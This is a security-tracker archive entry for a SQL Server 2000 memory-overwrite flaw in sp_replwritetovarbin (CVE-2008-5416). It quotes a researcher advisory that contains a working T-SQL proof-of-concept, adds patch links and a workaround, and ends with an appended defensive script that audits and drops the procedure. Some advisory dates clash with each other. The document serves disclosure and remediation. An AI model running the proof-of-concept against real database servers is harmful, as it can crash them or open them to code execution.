SecurityTracker
Archives
Category: Application (Database) > Microsoft SQL Server
Vendors: Microsoft
Microsoft SQL Server Memory Overwrite Bug in sp_replwritetovarbin May Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID: 1021363
SecurityTracker URL: http://securitytracker.com/id/1021363
CVE Reference: CVE-2008-5416
Updated: Feb 10 2009
Original Entry Date: Dec 9 2008
Impact: Execution of arbitrary code via network, User access via network
Fix Available: Yes
Vendor Confirmed: Yes
Version(s): 2000; 8.00.2039 and prior versions
Description: A vulnerability was reported in Microsoft SQL Server. A remote authenticated user can execute arbitrary code on the target system.

A remote authenticated user can supply specially crafted parameters to the sp_replwritetovarbin extended stored procedure to overwrite memory and potentially execute arbitrary code on the target system. The code will run with the privileges of the target SQL service.

The vendor was notified on April 17, 2008.

Bernhard Mueller of SEC Consult Vulnerability Lab reported this vulnerability.

The original advisory is available at:

http://www.sec-consult.com/files/20081209_mssql-000-sp_replwritetovarbin_memwrite.txt

Impact: A remote authenticated user can execute arbitrary code on the target system with the privileges of the target SQL service.
Solution: The vendor has issued a fix.

The available GDR and QFE software updates are listed in the vendor's advisory.

The vendor has also issued the following fixes for Windows components:

Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2, Microsoft SQL Server 2000 Desktop Engine (WMSDE):

http://www.microsoft.com/downloads/details.aspx?familyid=218809d6-a9fb-408b-a34d-ab2ac786994c

Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2, Windows Internal Database (WYukon) Service Pack 2:

http://www.microsoft.com/downloads/details.aspx?familyid=16925be5-98d0-446b-9bbc-d9a2d335c69e

Windows Server 2003 x64 Edition and Windows Server 2003 x64 Edition Service Pack 2, Microsoft SQL Server 2000 Desktop Engine (WMSDE):

http://www.microsoft.com/downloads/details.aspx?familyid=87183155-6770-4ea2-acca-191de4d40d27

Windows Server 2003 x64 Edition and Windows Server 2003 x64 Edition Service Pack 2, Windows Internal Database (WYukon) x64 Edition Service Pack 2:

http://www.microsoft.com/downloads/details.aspx?familyid=05c5c265-cfd7-4364-b323-77650b7f1e67

Windows Server 2008 for 32-bit Systems*, Windows Internal Database (WYukon) Service Pack 2:

http://www.microsoft.com/downloads/details.aspx?familyid=16925be5-98d0-446b-9bbc-d9a2d335c69e

Windows Server 2008 for x64-based Systems* , Windows Internal Database (WYukon) x64 Edition Service Pack 2:

http://www.microsoft.com/downloads/details.aspx?familyid=05c5c265-cfd7-4364-b323-77650b7f1e67

A restart is required.

The Microsoft advisory is available at:

http://www.microsoft.com/technet/security/bulletin/ms09-004.mspx

Vendor URL: www.microsoft.com/technet/security/bulletin/ms09-004.mspx
Cause: Access control error
Underlying OS: Windows (2000), Windows (2003), Windows (2008)

Message History:   None.


Source Message Contents

Subject:  [Full-disclosure] SEC Consult SA-20081109-0 :: Microsoft SQL Server

SEC Consult Security Advisory < 20081209-0 >
=====================================================================================
                  title: Microsoft SQL Server 2000 sp_replwritetovarbin
                         limited memory overwrite vulnerability
                program: Microsoft SQL Server 2000
     vulnerable version: <=8.00.2039
               homepage: www.microsoft.com
                  found: 04-12-2008
                     by: Bernhard Mueller (SEC Consult Vulnerability Lab)
             perm. link: http://www.sec-consult.com/files/20081209_mssql-2000-sp_replwritetovarbin_memwrite.txt
=====================================================================================

Product description:
--------------------

Microsoft SQL Server is a relational database management system (RDBMS)
produced by Microsoft. Its primary query language is Transact-SQL, an
implementation of the ANSI/ISO standard Structured Query Language (SQL)
used by both Microsoft and Sybase.


Vulnerability overview:
-----------------------

By calling the extended stored procedure sp_replwritetovarbin, and
supplying several uninitialized variables as parameters, it is possible
to trigger a memory write to a controlled location. Depending on the
underlying Windows version, it is / may be possible to use this
vulnerability to execute arbitrary code in the context of the vulnerable
SQL server process.
In a default configuration, the sp_replwritetovarbin stored procedure is
accessible by anyone. The vulnerability can be exploited by an
authenticated user with a direct database connection, or via SQL
injection in a vulnerable web application.


Vulnerability details:
----------------------

The following T-SQL script can be used to test for the vulnerability:


--------------------------------
DECLARE @buf NVARCHAR(4000),
@val NVARCHAR(4),
@counter INT

SET @buf = '
declare @retcode int,
@end_offset int,
@vb_buffer varbinary,
@vb_bufferlen int,
@buf nvarchar;
exec master.dbo.sp_replwritetovarbin 1,
  @end_offset output,
  @vb_buffer output,
  @vb_bufferlen output,'''

SET @val = CHAR(0x41)

SET @counter = 0
WHILE @counter < 3000
BEGIN
  SET @counter = @counter + 1
  SET @buf = @buf + @val
END

SET @buf = @buf + ''',''1'',''1'',''1'',
''1'',''1'',''1'',''1'',''1'',''1'''

EXEC master..sp_executesql @buf
--------------------------------


This triggers an access violation exception (write to address
0x41414141).
The vulnerability has been successfully used to execute arbitrary code
on a lab machine.
SEC Consult will not release code execution exploits for this
vulnerability to the public.


Workaround:
-----------

Remove the sp_replwritetovarbin extended stored procedure. Run the
following as an administrator:

execute dbo.sp_dropextendedproc 'sp_replwritetovarbin'

See also:

"Removing an Extended Stored Procedure from SQL Server"
http://msdn.microsoft.com/en-us/library/aa215995(SQL.80).aspx


Patch:
------

According to an email received by Microsoft in September, a fix for this
vulnerability has been completed.
The release schedule for this fix is currently unknown.


Vendor timeline:
----------------
Vendor notified: 2008-04-17
Vendor response: 2008-04-17
Last response from Microsoft: 09-29-2008
Request for update status 1: 10-14-2008
Request for update status 2: 10-29-2008
Request for update status 3: 11-12-2008
Request for update status 4 and prenotification about advisory release date: 11-28-2008
Public release: 11-09-2008

--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

EOF Bernhard Mueller / @2008


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
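The workaround in the advisory above is a single sp_dropextendedproc call. The following T-SQL script is an added example (it is not part of the SEC Consult advisory or the Microsoft bulletin) that turns it into an assessment-then-mitigate step a DBA can run on a SQL Server 2000 instance: it reports the engine build so it can be compared against the 8.00.2039 threshold on this page, checks whether the extended stored procedure is still registered, lists who holds EXECUTE on it (the advisory says it is reachable by anyone in a default configuration), and only then drops it. It assumes the SQL Server 2000 system catalog (dbo.sysobjects with xtype 'X' for extended stored procedures, sp_helprotect, SERVERPROPERTY) and a sysadmin connection to master; the column aliases and PRINT messages are my own.

```sql
-- Added example, not from SEC Consult or Microsoft. Run in master as sysadmin
-- on SQL Server 2000. Assumes the SQL Server 2000 catalog views and procedures
-- (dbo.sysobjects, sp_helprotect, sp_dropextendedproc, SERVERPROPERTY).
USE master
GO

-- 1. Engine build. The advisory lists builds <= 8.00.2039 as vulnerable; the
--    real fix is the MS09-004 update referenced on this page, not the drop below.
SELECT CONVERT(NVARCHAR(32), SERVERPROPERTY('ProductVersion')) AS product_version,
       CONVERT(NVARCHAR(32), SERVERPROPERTY('ProductLevel'))   AS product_level
GO

-- 2. Is the extended stored procedure still registered? In sysobjects,
--    xtype 'X' marks an extended stored procedure.
IF EXISTS (SELECT 1
           FROM dbo.sysobjects
           WHERE name = 'sp_replwritetovarbin' AND xtype = 'X')
BEGIN
    PRINT 'sp_replwritetovarbin is registered in master'

    -- 3. Who may execute it? On a default configuration expect an EXECUTE
    --    grant to public, which is what makes the bug reachable from any
    --    authenticated login (or from SQL injection in an application login).
    EXEC dbo.sp_helprotect @name = 'sp_replwritetovarbin'

    -- 4. Workaround from the advisory: deregister the procedure. It belongs
    --    to the replication support routines, so confirm replication is not
    --    in use on this instance before running this in production.
    EXEC dbo.sp_dropextendedproc 'sp_replwritetovarbin'
    PRINT 'sp_replwritetovarbin has been dropped'
END
ELSE
    PRINT 'sp_replwritetovarbin is not registered: nothing to drop'
GO
```

Run step 1 through 3 on their own first (comment out step 4) to inventory affected instances; the sp_helprotect output is the evidence that the procedure was exposed to public, and the ProductVersion value is what to re-check after the MS09-004 update and restart described under Solution above.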

Copyright 2019, SecurityGlobal.net LLC